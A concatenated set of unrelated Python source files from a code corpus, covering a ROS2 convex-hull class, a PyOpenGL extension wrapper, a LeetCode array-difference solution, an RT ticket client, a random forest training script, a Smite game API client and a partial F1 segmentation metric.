import numpy as np
import random
# ROS2 msgs
from autonomous_exploration_msgs.msg import PointGroup
class PointsGroup:
"""
Class similar to the one used in unity, created
to handle each area in the interactive map
"""
def __init__(self, pG : PointGroup) -> None:
# Store the map related data
self.mapOrigin = pG.map_origin
self.mapDims = pG.map_dims
self.mapResolution = pG.map_resolution
self.associated_file = pG.associated_file
# Store the group related data
self.groupID = pG.group_id
self.numOfPoints = int(0.5 * len(pG.map_pos))
self.mapPos = np.zeros([self.numOfPoints, 2])
for i in range(self.numOfPoints):
self.mapPos[i, 0] = pG.map_pos[2 * i]
self.mapPos[i, 1] = pG.map_pos[2 * i + 1]
# Generate the convexHull
# Check if there are enough points in the group before generating the convex hull
self.convexHullPoints = []
if self.numOfPoints > 3:
self.GenerateConvexHull()
def GenerateConvexHull(self) -> None:
"""
Generate the convex hull using the points of the interactive area
Same code as the one used in the unity package
"""
vertices = list(self.mapPos.copy())
vertices = [list(tmp) for tmp in vertices]
# Step 1: Find the vertex with the smallest x coordinate
startPos = vertices[0]
for vert in vertices:
if ( vert[0] < startPos[0]):
startPos = vert
#print(startPos)
#print(vertices)
self.convexHullPoints.append(startPos)
vertices.remove(startPos)
# Step2 : Loop to generate the convex hull
currPos = self.convexHullPoints[0]
cnt = 0
while True:
# After 2 iterations we have to add the start position again so we can terminate the algorithm
if (cnt == 2):
vertices.append(self.convexHullPoints[0])
# Check if there are no more points
if (len(vertices) == 0):
break
# Pick the next point randomly
nextPos = vertices[random.randint(0, len(vertices) - 1)]
a = currPos
b = nextPos
# Check if there's a point to the left of ab, if so then it's the new b
for vert in vertices:
# Skip the point picked randomly
if vert == nextPos:
continue
# Compare the point and the line
# To the left = better point, so pick it as next point on the convex hull
if self.CompareLinePoint(a, b, vert) > 0:
nextPos = vert
b = vert
# Update the convexHull
self.convexHullPoints.append(nextPos)
currPos = nextPos
# Check if we found again the first point of the convexhull
if currPos == self.convexHullPoints[0]:
del self.convexHullPoints[-1]
break
cnt += 1
@staticmethod
def CompareLinePoint(a : np.array, b : np.array, c : np.array) -> int:
""" Return the position of a point relative to a line """
# Where is c in relation to a-b ?
# < 0 -> to the right
# = 0 -> on the line
# > 0 -> to the left
relation = (a[0] - c[0]) * (b[1] - c[1]) - (b[0] - c[0]) * (a[1] - c[1])
return relation
def InConvexHull(self, c : list) -> bool:
""" Check if the point is inside the convex hull """
# Check if there are enough points to create the convex Hull
if (self.numOfPoints < 3):
return False
inConvexHull = True
# if the point is on the left of all the line segments
# of the convexHull then it's on the outside
for i in range(len(self.convexHullPoints) - 1):
a = self.convexHullPoints[i]
b = self.convexHullPoints[i + 1]
#print(a, b, c, self.groupID, self.CompareLinePoint(a, b, c))
# Check if it's left or right of the line ab
if (self.CompareLinePoint(a, b, c) > 0):
inConvexHull = False
break
# Check for the last line segment
a = self.convexHullPoints[-1]
b = self.convexHullPoints[0]
if (self.CompareLinePoint(a, b, c) > 0):
inConvexHull = False
return inConvexHull
| 3.359375 | 3 |
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/GL/EXT/separate_shader_objects.py | JE-Chen/je_old_repo | 0 | 12760330 | '''OpenGL extension EXT.separate_shader_objects
This module customises the behaviour of the
OpenGL.raw.GL.EXT.separate_shader_objects to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/separate_shader_objects.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.EXT.separate_shader_objects import *
from OpenGL.raw.GL.EXT.separate_shader_objects import _EXTENSION_NAME
def glInitSeparateShaderObjectsEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glCreateShaderProgramvEXT.strings size not checked against count
glCreateShaderProgramvEXT=wrapper.wrapper(glCreateShaderProgramvEXT).setInputArraySize(
'strings', None
)
# INPUT glDeleteProgramPipelinesEXT.pipelines size not checked against n
glDeleteProgramPipelinesEXT=wrapper.wrapper(glDeleteProgramPipelinesEXT).setInputArraySize(
'pipelines', None
)
# INPUT glGenProgramPipelinesEXT.pipelines size not checked against n
glGenProgramPipelinesEXT=wrapper.wrapper(glGenProgramPipelinesEXT).setInputArraySize(
'pipelines', None
)
# INPUT glGetProgramPipelineInfoLogEXT.infoLog size not checked against bufSize
glGetProgramPipelineInfoLogEXT=wrapper.wrapper(glGetProgramPipelineInfoLogEXT).setInputArraySize(
'infoLog', None
).setInputArraySize(
'length', 1
)
# INPUT glProgramUniform1fvEXT.value size not checked against count
glProgramUniform1fvEXT=wrapper.wrapper(glProgramUniform1fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform1ivEXT.value size not checked against count
glProgramUniform1ivEXT=wrapper.wrapper(glProgramUniform1ivEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform2fvEXT.value size not checked against count*2
glProgramUniform2fvEXT=wrapper.wrapper(glProgramUniform2fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform2ivEXT.value size not checked against count*2
glProgramUniform2ivEXT=wrapper.wrapper(glProgramUniform2ivEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform3fvEXT.value size not checked against count*3
glProgramUniform3fvEXT=wrapper.wrapper(glProgramUniform3fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform3ivEXT.value size not checked against count*3
glProgramUniform3ivEXT=wrapper.wrapper(glProgramUniform3ivEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform4fvEXT.value size not checked against count*4
glProgramUniform4fvEXT=wrapper.wrapper(glProgramUniform4fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform4ivEXT.value size not checked against count*4
glProgramUniform4ivEXT=wrapper.wrapper(glProgramUniform4ivEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix2fvEXT.value size not checked against count*4
glProgramUniformMatrix2fvEXT=wrapper.wrapper(glProgramUniformMatrix2fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix3fvEXT.value size not checked against count*9
glProgramUniformMatrix3fvEXT=wrapper.wrapper(glProgramUniformMatrix3fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix4fvEXT.value size not checked against count*16
glProgramUniformMatrix4fvEXT=wrapper.wrapper(glProgramUniformMatrix4fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform1uivEXT.value size not checked against count
glProgramUniform1uivEXT=wrapper.wrapper(glProgramUniform1uivEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform2uivEXT.value size not checked against count*2
glProgramUniform2uivEXT=wrapper.wrapper(glProgramUniform2uivEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform3uivEXT.value size not checked against count*3
glProgramUniform3uivEXT=wrapper.wrapper(glProgramUniform3uivEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniform4uivEXT.value size not checked against count*4
glProgramUniform4uivEXT=wrapper.wrapper(glProgramUniform4uivEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix4fvEXT.value size not checked against count*16
glProgramUniformMatrix4fvEXT=wrapper.wrapper(glProgramUniformMatrix4fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix2x3fvEXT.value size not checked against count*6
glProgramUniformMatrix2x3fvEXT=wrapper.wrapper(glProgramUniformMatrix2x3fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix3x2fvEXT.value size not checked against count*6
glProgramUniformMatrix3x2fvEXT=wrapper.wrapper(glProgramUniformMatrix3x2fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix2x4fvEXT.value size not checked against count*8
glProgramUniformMatrix2x4fvEXT=wrapper.wrapper(glProgramUniformMatrix2x4fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix4x2fvEXT.value size not checked against count*8
glProgramUniformMatrix4x2fvEXT=wrapper.wrapper(glProgramUniformMatrix4x2fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix3x4fvEXT.value size not checked against count*12
glProgramUniformMatrix3x4fvEXT=wrapper.wrapper(glProgramUniformMatrix3x4fvEXT).setInputArraySize(
'value', None
)
# INPUT glProgramUniformMatrix4x3fvEXT.value size not checked against count*12
glProgramUniformMatrix4x3fvEXT=wrapper.wrapper(glProgramUniformMatrix4x3fvEXT).setInputArraySize(
'value', None
)
### END AUTOGENERATED SECTION | 2.078125 | 2 |
src/the_difference_between_two_sorted_arrays.py | seekplum/leetcode | 0 | 12760331 | # -*- coding: utf-8 -*-
"""
#=============================================================================
# ProjectName: leetcode
# FileName: the_difference_between_two_sorted_arrays
# Desc: 给定两个大小为 m 和 n 的有序数组 nums1 和 nums2
# 请找出这 存在nums1数组中,但是不存在nums2数组中的所有数字,要求算法的时间复杂度为 O(log (m+n))
# 示例 1:
# nums1 = [1, 3]
# nums2 = [2, 3]
# 结果是 [1]
# Author: seekplum
# Email: <EMAIL>
# HomePage: seekplum.github.io
# Create: 2019-04-26 19:03
#=============================================================================
"""
# def check(num, pos):
# return 1 if num >= b[pos] else 0
#
#
# # l = 0
# # r = len(b)
# def divide(l, r, num):
# while l <= r:
# mid = (l + r) / 2
# result = check(num, mid)
# if result == 1:
# r = mid - 1
# elif result == 0:
# l = mid + 1
#
# return num == b[l]
def divide(nums1, nums2):
"""查存在nums1但不存在nums2的所有元素
"""
result = []
i = 0
j = 0
length1 = len(nums1)
length2 = len(nums2)
while i < length1 and j < length2:
num1 = nums1[i]
num2 = nums2[j]
if num1 < num2:
result.append(num1)
i += 1
elif num1 > num2:
j += 1
else:
i += 1
j += 1
# 处理 nums1 数组中还有元素未对比的情况
result.extend(nums1[i:])
return result
| 3.53125 | 4 |
hostel/tracker/models.py | phylocko/hostel | 0 | 12760332 | <gh_stars>0
import rt
from rt import AuthorizationError, APISyntaxError
from hostel.settings import RT_URL, RT_QUEUE, RT_USER, RT_PASS
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class Rt(metaclass=Singleton):
APISyntaxError = APISyntaxError
class LoginError(Exception):
pass
def __init__(self):
print('Initializing RT...')
self.tracker = rt.Rt(RT_URL, RT_USER, RT_PASS)
self.login()
def login(self):
for i in range(1, 4):
if self.tracker.login():
return
raise self.LoginError('Unable to login RT after 3 attempts')
def create_ticket(self, **kwargs):
if not kwargs.get('Queue'):
kwargs['Queue'] = RT_QUEUE
return self.action_with_relogin(self.tracker.create_ticket, **kwargs)
def edit_ticket(self, ticket_id, **kwargs):
self.action_with_relogin(self.tracker.edit_ticket, ticket_id, **kwargs)
def reply(self, ticket_id, **kwargs):
self.action_with_relogin(self.tracker.reply, ticket_id, **kwargs)
def comment(self, ticket_id, **kwargs):
self.action_with_relogin(self.tracker.comment, ticket_id, **kwargs)
def edit_link(self, ticket_id, link_type, parent_id):
self.action_with_relogin(self.tracker.edit_link, ticket_id, link_type, parent_id)
def action_with_relogin(self, action, *args, **kwargs):
try:
return action(*args, **kwargs)
except AuthorizationError:
self.login()
return action(*args, **kwargs)
| 2.015625 | 2 |
sk_classification_RandomForest/random_forest_classifier.py | AccessibleAI/ailibrary | 5 | 12760333 | """
All rights reserved to cnvrg.io
http://www.cnvrg.io
cnvrg.io - AI library
Written by: <NAME>
Last update: Oct 06, 2019
Updated by: <NAME>
random_forest_classifier.py
==============================================================================
"""
import argparse
import pandas as pd
from SKTrainer import *
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
def _cast_types(args):
"""
This method performs casting to all types of inputs passed via cmd.
:param args: argparse.ArgumentParser object.
:return: argparse.ArgumentParser object.
"""
args.x_val = None if args.x_val == 'None' else int(args.x_val)
args.test_size = float(args.test_size)
args.n_estimators = int(args.n_estimators)
args.max_depth = None if args.max_depth == 'None' else int(args.max_depth)
# min_samples_split.
try:
args.min_samples_split = int(args.min_samples_split)
except ValueError:
args.min_samples_split = float(args.min_samples_split)
# min_samples_leaf.
try:
args.min_samples_leaf = int(args.min_samples_leaf)
except ValueError:
args.min_samples_leaf = float(args.min_samples_leaf)
args.min_weight_fraction_leaf = float(args.min_weight_fraction_leaf)
# max_features.
if args.max_features in ["auto", "sqrt", "log2"]:
pass
elif args.max_features == "None" or args.max_features == 'None':
args.max_features = None
else:
try:
args.max_features = float(args.max_features)
except ValueError:
args.max_features = int(args.max_features)
args.max_leaf_nodes = None if args.max_leaf_nodes == 'None' else int(args.max_leaf_nodes)
args.min_impurity_decrease = float(args.min_impurity_decrease)
args.min_impurity_split = None if args.min_impurity_split == 'None' else float(args.min_impurity_split)
args.bootstrap = (args.bootstrap in ['True', "True", 'true', "true"])
args.oob_score = (args.oob_score in ['True', "True", 'true', "true"])
args.n_jobs = None if args.n_jobs == 'None' else int(args.n_jobs)
args.random_state = None if args.random_state == 'None' else int(args.random_state)
args.verbose = int(args.verbose)
args.warm_start = (args.warm_start in ['True', "True", 'true', "true"])
# class_weight. (problematic)
if args.class_weight == "None" or args.class_weight == 'None':
args.class_weight = None
else:
args.class_weight = dict(args.class_weight)
# --- ---------------------------------------- --- #
return args
def main(args):
args = _cast_types(args)
# Minimal number of rows and columns in the csv file.
MINIMAL_NUM_OF_ROWS = 10
MINIMAL_NUM_OF_COLUMNS = 2
# Loading data, and splitting it to train and test based on user input
data = pd.read_csv(args.data, index_col=0)
# Check for unfit given dataset and splitting to X and y.
rows_num, cols_num = data.shape
if rows_num < MINIMAL_NUM_OF_ROWS: raise ValueError("LibraryError: The given csv doesn't have enough rows (at least 10 examples must be given).")
if cols_num < MINIMAL_NUM_OF_COLUMNS: raise ValueError("DatasetError: Not enough columns in the csv (at least 2 columns must be given).")
# Split to X and y (train & test).
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=args.test_size)
# Model initialization.
model = RandomForestClassifier(
n_estimators=args.n_estimators,
criterion=args.criterion,
max_depth=args.max_depth,
min_samples_split=args.min_samples_split,
min_samples_leaf=args.min_samples_leaf,
min_weight_fraction_leaf=args.min_weight_fraction_leaf,
max_features=args.max_features,
max_leaf_nodes=args.max_leaf_nodes,
min_impurity_decrease=args.min_impurity_decrease,
min_impurity_split=args.min_impurity_split,
bootstrap=args.bootstrap,
oob_score=args.oob_score,
n_jobs=args.n_jobs,
random_state=args.random_state,
verbose=args.verbose,
warm_start=True,
class_weight=args.class_weight
)
folds = None if args.x_val is None else args.x_val
trainer = SKTrainer(model=model,
train_set=(X_train, y_train),
test_set=(X_test, y_test),
output_model_name=args.output_model,
testing_mode=args.test_mode,
folds=folds)
trainer.run()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="""Random Forests Classifier""")
# ----- cnvrg.io params.
parser.add_argument('--data', action='store', dest='data', required=True,
help="""String. path to csv file: The data set for the classifier. Assumes the last column includes the labels. """)
parser.add_argument('--project_dir', action='store', dest='project_dir',
help="""--- For inner use of cnvrg.io ---""")
parser.add_argument('--output_dir', action='store', dest='output_dir',
help="""--- For inner use of cnvrg.io ---""")
parser.add_argument('--x_val', action='store', default="None", dest='x_val',
help="""Integer. Number of folds for the cross-validation. Default is None.""")
parser.add_argument('--test_size', action='store', default="0.2", dest='test_size',
help="""Float. The portion of the data of testing. Default is 0.2""")
parser.add_argument('--output_model', action='store', default="model.sav", dest='output_model',
help="""String. The name of the output file which is a trained random forests model. Default is RandomForestModel.sav""")
parser.add_argument('--test_mode', action='store', default=False, dest='test_mode',
help="""--- For inner use of cnvrg.io ---""")
# ----- model's params.
parser.add_argument('--n_estimators', action='store', default="10", dest='n_estimators',
help="""int: The number of trees in the forest. Default is 10""")
parser.add_argument('--criterion', action='store', default='gini', dest='criterion',
help="""string: The function to measure the quality of a split. Supported criteria are “gini” for the Gini impurity and “entropy” for the information gain. Note: this parameter is tree-specific. Default is gini.""")
parser.add_argument('--max_depth', action='store', default="None", dest='max_depth',
help="""int: The maximum depth of the tree. If None, then nodes are expanded until all leaves are pure or until all leaves contain less than min_samples_split samples. Default is None""")
# Might be int or float.
parser.add_argument('--min_samples_split', action='store', default="2", dest='min_samples_split',
help="""int, float: The minimum number of samples required to split an internal node:
If int, then consider min_samples_split as the minimum number.
If float, then min_samples_split is a fraction and ceil(min_samples_split * n_samples) are the
minimum number of samples for each split.. Default is 2""")
# Might be int or float.
parser.add_argument('--min_samples_leaf', action='store', default="1", dest='min_samples_leaf',
help="""int, float: The minimum number of samples required to be at a leaf node. A split point
at any depth will only be considered if it leaves at least min_samples_leaf training samples in
each of the left and right branches. This may have the effect of smoothing the model, especially
in regression.
If int, then consider min_samples_leaf as the minimum number.
If float, then min_samples_leaf is a fraction and ceil(min_samples_leaf * n_samples) are the
minimum number of samples for each node. Default is 1""")
parser.add_argument('--min_weight_fraction_leaf', action='store', default="0.",
dest='min_weight_fraction_leaf', help="""float: The minimum weighted fraction of the sum total
of weights (of all the input samples) required to be at a leaf node. Samples have equal weight
when sample_weight is not provided. Default is 0.""")
# Might be int, float, string or None.
parser.add_argument('--max_features', action='store', default="auto", dest='max_features',
help="""int, float, string, None: The number of features to consider when looking for the best split.
If int, then consider max_features features at each split.
If float, then max_features is a fraction and int(max_features * n_features) features are
considered at each split.
If “auto”, then max_features=sqrt(n_features).
If “sqrt”, then max_features=sqrt(n_features) (same as “auto”).
If “log2”, then max_features=log2(n_features).
If None, then max_features=n_features
Default is None.""")
parser.add_argument('--max_leaf_nodes', action='store', default="None", dest='max_leaf_nodes',
help="""int, None,.Grow trees with max_leaf_nodes in best-first fashion Default is None.""")
parser.add_argument('--min_impurity_decrease', action='store', default="0.", dest='min_impurity_decrease',
help="""float,.A node will be split if this split induces a decrease of the impurity greater
than or equal to this value. Default is 0..""")
parser.add_argument('--min_impurity_split', action='store', default="None", dest='min_impurity_split',
help="""Deprecated since version 0.19: min_impurity_split has been deprecated in favor of
min_impurity_decrease in 0.19..""")
parser.add_argument('--bootstrap', action='store', default="True", dest='bootstrap',
help="""Boolean. Whether bootstrap samples are used when building trees. If False, the whole
dataset is used to build each tree. Default is True.""")
parser.add_argument('--oob_score', action='store', default="False", dest='oob_score',
help="""Boolean. Whether to use out-of-bag samples to estimate the generalization accuracy..
Default is False.""")
parser.add_argument('--n_jobs', action='store', default="1", dest='n_jobs',
help="""Integer. The number of jobs to run in parallel for both fit and predict. None means 1.
Default is None.""")
# Might be int, RandomState instance or None.
parser.add_argument('--random_state', action='store', default="None", dest='random_state',
help="""int, RandomState instance or None. If int, random_state is the seed used by the random
number generator; If RandomState instance, random_state is the random number generator; If None,
the random number generator is the RandomState instance used by np.random. Default is None.""")
parser.add_argument('--verbose', action='store', default="0", dest='verbose',
help="""Integer. Controls the verbosity when fitting and predicting. Default is 0.""")
parser.add_argument('--warm_start', action='store', default="True", dest='warm_start',
help="""Boolean. When set to True, reuse the solution of the previous call to fit and add more
estimators to the ensemble, otherwise, just fit a whole new forest.. Default is False.""")
# Might be dict, list of dicts, “balanced”, “balanced_subsample” or None
parser.add_argument('--class_weight', action='store', default="None", dest='class_weight',
help="""dict, list of dicts, “balanced”, “balanced_subsample” or None.
Weights associated with classes in the form {class_label: weight}. If not given, all classes are
supposed to have weight one. For multi-output problems, a list of dicts can be provided in the
same order as the columns of y. Default is None.""")
args = parser.parse_args()
main(args)
| 2.46875 | 2 |
smite.py | micahprice/smite-recommender | 0 | 12760334 | <reponame>micahprice/smite-recommender
"""
smite-python (github.com/jaydenkieran/smite-python)
Distributed under the MIT License by <NAME>
"""
import hashlib
import traceback
import urllib
from enum import Enum
from urllib.request import urlopen
import json
import logging
from datetime import datetime
version = '1.0_rc2'
# Initialise logging
logger = logging.getLogger('smitepython')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('recent.log', encoding='utf-8')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter(fmt='%(asctime)s [%(levelname)s]: %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
fh.setFormatter(formatter)
logger.addHandler(fh)
logger.info('Loaded smite-python {}, github.com/jaydenkieran/smite-python'.format(version))
class SmiteError(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
logger.error('SmiteError: {}'.format(args))
class NoResultError(SmiteError):
def __init__(self, *args, **kwargs):
SmiteError.__init__(self, *args, **kwargs)
class Endpoint(Enum):
"""
Valid enums: PC, PS4, XBOX
"""
PC = "http://api.smitegame.com/smiteapi.svc/"
PS4 = "http://api.ps4.smitegame.com/smiteapi.svc/"
XBOX = "http://api.xbox.smitegame.com/smiteapi.svc/"
class SmiteClient(object):
"""
Represents a connection to the Smite API.
This class is used to interact with the API and retrieve information in JSON.
Note
-----
Any player with Privacy Mode enabled in-game will return
a null dataset from methods that require a player name
"""
_RESPONSE_FORMAT = 'Json'
def __init__(self, dev_id, auth_key, lang=1):
"""
:param dev_id: Your private developer ID supplied by Hi-rez. Can be requested here: https://fs12.formsite.com/HiRez/form48/secure_index.html
:param auth_key: Your authorization key
:param lang: the language code needed by some queries, default to english.
"""
self.dev_id = str(dev_id)
self.auth_key = str(auth_key)
self.lang = lang
self._session = None
self._BASE_URL = Endpoint.PC.value
logger.debug('dev_id: {}, auth_key: {}, lang: {}'.format(self.dev_id, self.auth_key, self.lang))
def _make_request(self, methodname, parameters=None):
if not self._session or not self._test_session(self._session):
logger.info('Creating new session with the SmiteAPI')
self._session = self._create_session()
url = self._build_request_url(methodname, parameters)
url = url.replace(' ', '%20') # Cater for spaces in parameters
logger.debug('Built request URL for {}: {}'.format(methodname, url))
try:
html = urlopen(url).read()
except urllib.error.HTTPError as e:
if e.code == 404:
raise NoResultError("Request invalid. API auth details may be incorrect.") from None
if e.code == 400:
raise NoResultError("Request invalid. Bad request.") from None
else:
traceback.print_exc()
jsonfinal = json.loads(html.decode('utf-8'))
if not jsonfinal:
raise NoResultError("Request was successful, but returned no data.") from None
return jsonfinal
def _build_request_url(self, methodname, parameters=()):
signature = self._create_signature(methodname)
timestamp = self._create_now_timestamp()
session_id = self._session.get("session_id")
path = [methodname + SmiteClient._RESPONSE_FORMAT, self.dev_id, signature, session_id, timestamp]
if parameters:
path += [str(param) for param in parameters]
return self._BASE_URL + '/'.join(path)
def _create_session(self):
signature = self._create_signature('createsession')
url = '{0}/createsessionJson/{1}/{2}/{3}'.format(self._BASE_URL, self.dev_id, signature, self._create_now_timestamp())
try:
html = urlopen(url).read()
except urllib.error.HTTPError as e:
if e.code == 404:
raise NoResultError("Couldn't create session. API auth details may be incorrect.") from None
else:
traceback.print_exc()
return json.loads(html.decode('utf-8'))
def _create_now_timestamp(self):
datime_now = datetime.utcnow()
return datime_now.strftime("%Y%m%d%H%M%S")
def _create_signature(self, methodname):
now = self._create_now_timestamp()
return hashlib.md5(self.dev_id.encode('utf-8') + methodname.encode('utf-8') + self.auth_key.encode('utf-8') + now.encode('utf-8')).hexdigest()
def _test_session(self, session):
methodname = 'testsession'
timestamp = self._create_now_timestamp()
signature = self._create_signature(methodname)
path = "/".join(
[methodname + self._RESPONSE_FORMAT, self.dev_id, signature, session.get("session_id"), timestamp])
url = self._BASE_URL + path
logger.debug('Testing session using: {}'.format(url))
try:
html = urlopen(url).read()
except urllib.error.HTTPError as e:
if e.code == 404:
raise NoResultError("Couldn't test session. API auth details may be incorrect.") from None
else:
traceback.print_exc()
return "successful" in json.loads(html.decode('utf-8'))
def _switch_endpoint(self, endpoint):
if not isinstance(endpoint, Endpoint):
raise SmiteError("You need to use an enum to switch endpoints")
self._BASE_URL = endpoint.value
logger.debug('Endpoint switch. New call URL: {}'.format(self._BASE_URL))
return
def ping(self):
"""
:return: Indicates whether the request was successful
Note
-----
Pinging the Smite API is used to establish connectivity.
You do not need to authenticate your ID or key to do this.
"""
url = '{0}/pingJson'.format(self._BASE_URL)
html = urlopen(url).read()
return json.loads(html.decode('utf-8'))
def get_data_used(self):
"""
:return: Returns a dictionary of daily usage limits and the stats against those limits
Note
-----
Getting your data usage does contribute to your
daily API limits
"""
return self._make_request('getdataused')
def get_demo_details(self, match_id):
"""
:param match_id: ID of the match
:return: Returns information regarding a match
Note
-----
It is better practice to use :meth:`get_match_details`
"""
return self._make_request('getdemodetails', [match_id])
def get_gods(self):
"""
:return: Returns all smite Gods and their various attributes
"""
return self._make_request('getgods', [self.lang])
def get_god_skins(self, god_id):
"""
:param: god_id: ID of god you are querying. Can be found in get_gods return result.
:return: Returnss all skin information for a particular god
"""
return self._make_request('getgodskins', [god_id])
def get_items(self):
"""
:return: Returns all Smite items and their various attributes
"""
return self._make_request('getitems', [self.lang])
def get_god_recommended_items(self, god_id):
"""
:param god_id: ID of god you are querying. Can be found in get_gods return result.
:return: Returns a dictionary of recommended items for a particular god
"""
return self._make_request('getgodrecommendeditems', [god_id])
def get_esports_proleague_details(self):
"""
:return: Returns the matchup information for each matchup of the current eSports pro league session.
"""
return self._make_request('getesportsproleaguedetails')
def get_top_matches(self):
"""
:return: Returns the 50 most watch or most recent recorded matches
"""
return self._make_request('gettopmatches')
def get_match_details(self, match_id):
"""
:param match_id: The id of the match
:return: Returns a dictionary of the match and it's attributes.
"""
return self._make_request('getmatchdetails', [match_id])
def get_match_ids_by_queue(self, queue, date, hour=-1):
"""
:param queue: The queue to obtain data from
:param date: The date to obtain data from
:param hour: The hour to obtain data from (0-23, -1 = all day)
:return: Returns a list of all match IDs for a specific match queue for given time frame
"""
return self._make_request('getmatchidsbyqueue', [queue, date, hour])
def get_league_leaderboard(self, queue, tier, season):
"""
:param queue: The queue to obtain data from
:param tier: The tier to obtain data from
:param season: The season to obtain data from
:return: Returns the top players for a particular league
"""
return self._make_request('getleagueleaderboard', [queue, tier, season])
def get_league_seasons(self, queue):
"""
:param queue: The queue to obtain data from
:return: Returns a list of seasons for a match queue
"""
return self._make_request('getleagueseasons', [queue])
def get_team_details(self, clan_id):
"""
:param clan_id: The id of the clan
:return: Returns the details of the clan in a python dictionary
"""
return self._make_request('getteamdetails', [clan_id])
def get_team_match_history(self, clan_id):
"""
:param clan_id: The ID of the clan.
:return: Returns a history of matches from the given clan.
Warning
-----
This method is deprecated and will return a null dataset
"""
return self._make_request('getteammatchhistory', [clan_id])
def get_team_players(self, clan_id):
"""
:param clan_id: The ID of the clan
:return: Returns a list of players for the given clan.
"""
return self._make_request('getteamplayers', [clan_id])
def search_teams(self, search_team):
"""
:param search_team: The string search term to search against
:return: Returns high level information for clan names containing search_team string
"""
return self._make_request('searchteams', [search_team])
def get_player(self, player_name):
"""
:param player_name: the string name of a player
:return: Returns league and non-league high level data for a given player name
"""
return self._make_request('getplayer', [player_name])
def get_player_achievements(self, player_id):
"""
:param player_id: ID of a player
:return: Returns a select number of achievement totals for the specified player ID
"""
return self._make_request('getplayerachievements', [player_id])
def get_player_status(self, player_name):
"""
:param player_name: the string name of a player
:return: Returns the current online status of a player
"""
return self._make_request('getplayerstatus', [player_name])
def get_friends(self, player):
"""
:param player: The player name or a player ID
:return: Returns a list of friends
"""
return self._make_request('getfriends', [player])
def get_god_ranks(self, player):
"""
:param player: The player name or player ID
:return: Returns the rank and worshippers value for each God the player has played
"""
return self._make_request('getgodranks', [player])
def get_match_history(self, player):
"""
:param player: The player name or player ID
:return: Returns the recent matches and high level match statistics for a particular player.
"""
return self._make_request('getmatchhistory', [str(player)])
def get_match_player_details(self, match_id):
"""
:param match_id: The ID of the match
:return: Returns player information for a live match
"""
return self._make_request('getmatchplayerdetails', [match_id])
def get_motd(self):
"""
:return: Returns information about the most recent Match of the Days
"""
return self._make_request('getmotd')
def get_queue_stats(self, player, queue):
"""
:param player: The player name or player ID
:param queue: The id of the game mode
:return: Returns match summary statistics for a player and queue
"""
return self._make_request('getqueuestats', [str(player), str(queue)])
| 2.171875 | 2 |
lib/metrics/F1_running_score.py | shampooma/openseg.pytorch | 1,069 | 12760335 | <gh_stars>1000+
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: JingyiXie, RainbowSecret
## Microsoft Research
## <EMAIL>
## Copyright (c) 2019
##
## Code adapted from:
## https://github.com/nv-tlabs/GSCNN/blob/master/utils/f_boundary.py
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pdb
import numpy as np
import torch
from multiprocessing.pool import Pool
class F1RunningScore(object):
def __init__(self, configer=None, num_classes=None, boundary_threshold=0.00088, num_proc=15):
assert configer is not None or num_classes is not None
self.configer = configer
if configer is not None:
self.n_classes = self.configer.get('data', 'num_classes')
else:
self.n_classes = num_classes
self.ignore_index = -1
self.boundary_threshold = boundary_threshold
self.pool = Pool(processes=num_proc)
self.num_proc = num_proc
self._Fpc = 0
self._Fc = 0
self.seg_map_cache = []
self.gt_map_cache = []
def _update_cache(self, seg_map, gt_map):
"""
Append inputs to `seg_map_cache` and `gt_map_cache`.
Returns whether the length reached our pool size.
"""
self.seg_map_cache.extend(seg_map)
self.gt_map_cache.extend(gt_map)
return len(self.gt_map_cache) >= self.num_proc
def _get_from_cache(self):
n = self.num_proc
seg_map, self.seg_map_cache = self.seg_map_cache[:n], self.seg_map_cache[n:]
gt_map, self.gt_map_cache = self.gt_map_cache[:n], self.gt_map_cache[n:]
return seg_map, gt_map
def update(self, seg_map, gt_map):
if self._update_cache(seg_map, gt_map):
seg_map, gt_map = self._get_from_cache()
self._update_scores(seg_map, gt_map)
else:
return
def _update_scores(self, seg_map, gt_map):
batch_size = len(seg_map)
if batch_size == 0:
return
Fpc = np.zeros(self.n_classes)
